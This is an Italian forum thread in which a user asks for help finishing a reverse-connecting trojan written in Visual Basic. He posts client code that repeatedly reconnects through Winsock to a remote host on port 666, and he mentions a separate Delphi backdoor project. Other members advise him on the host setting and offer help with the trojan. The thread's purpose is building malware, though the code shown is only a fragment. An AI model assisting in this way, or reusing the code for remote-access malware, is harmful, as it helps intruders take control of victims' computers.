BeRlUsConIh

Utente Medio
Autore del topic
21 Ottobre 2009
193
0
Miglior risposta
0
Ciao a tutti utenti dello sciax2 ultimamente sto creando un trojan reverse ....solo che vorrei un maggiore chiarimento su qualche piccola cosa...
ecco le source del server(che vanno bene)
Public NumSockets As Integer


Codice:
Perfavore, Entra oppure Registrati per vedere i codici!
e fin qui tutto bene... adesso l'unica parte del client che non ho capito è questa(parte in rosso)

Private Sub Form_Load()

Winsock1.Close

Timer1.Enabled = True

End Sub


Private Sub Timer1_Timer()

Winsock1.Close

Winsock1.RemotePort = 666

Winsock1.RemoteHost = "cosa devo mettere qui????"

Winsock1.Connect

Print "

End Sub


Private Sub Winsock1_Close()

Timer1.Enabled = True

End Sub


Private Sub Winsock1_Connect()

Timer1.Enabled = False

End Sub
 
Devi mettere un qualcosa che riesce a collegarsi al Server usando un host. Come una specie di IP, però devi metterlo anche nel Server, altrimenti come si collega...
 
è vero...lo avevo dimenticato è da un sacco di tempo che non tocco piu il vb
p.s. per l'host è tutto a posto...potresti (se vuoi) postarmi il codice che intendi del server?
grazie ;)
 
Ultima modifica:
è vero...lo avevo dimenticato è da un sacco di tempo che non tocco piu il vb quindi nel server cosa dovrei mettere?

Eh, bella domanda. Io non ho mai lavorato con i Winsock, ma andandoci ad intuito dovresti fare in modo che in quella stringa di codice in rosso evidenziata da te, si connetta alla porta del Server...Oppure puoi mettere il collegamento con un IP, che è la stessa cosa, ma meglio con una porta.
 
mmm...grazie di tutto proverò appena possibile ;)
p.s. comunque considerando il server dovrebbe andarci solo l'host
 
Potrei esserti utile se sapessi in che linguaggio vuoi realizzare il trojan.Delphi?
 
mmm...grazie di tutto proverò appena possibile ;)
p.s. comunque considerando il server dovrebbe andarci solo l'host

Dipende da quello che vuoi mettere tu...

Potrei esserti utile se sapessi in che linguaggio vuoi realizzare il trojan.Delphi?

Non vedi che è VB.NET ? :emoji_relieved:

Madonna aiuta questo povero uomo!!

Ma non vedi che la sezione è visualbasic nabbooooooooooooooooooooooooo -.-.-.-.-

Calma. xD
 
Sto gia lavorando con altri programmatori a una backdoor in delphi ..solo che ho deciso di ripassare un po il vecchio vb :emoji_relieved:
 
Scusate

Ja ma ci voleva proprio.. significa che trova le discussione a caso senza leggere dove si trova.

Scusate mi sono espresso male...intendevo chiedere se il visual basic che usi è il 6, l'8 o il 2010?Ho scritto Delphi solo perchè sapevo che lo stavi facendo in quel linguaggio il tuo Trojan...
Ora perlomeno so che è VB.NET
--------------- AGGIUNTA AL POST ---------------
Ja ma ci voleva proprio.. significa che trova le discussione a caso senza leggere dove si trova.

Ho preso la discussione dalla pagina principale del forum senza vedere poi la categoria
 
Ultima modifica da un moderatore: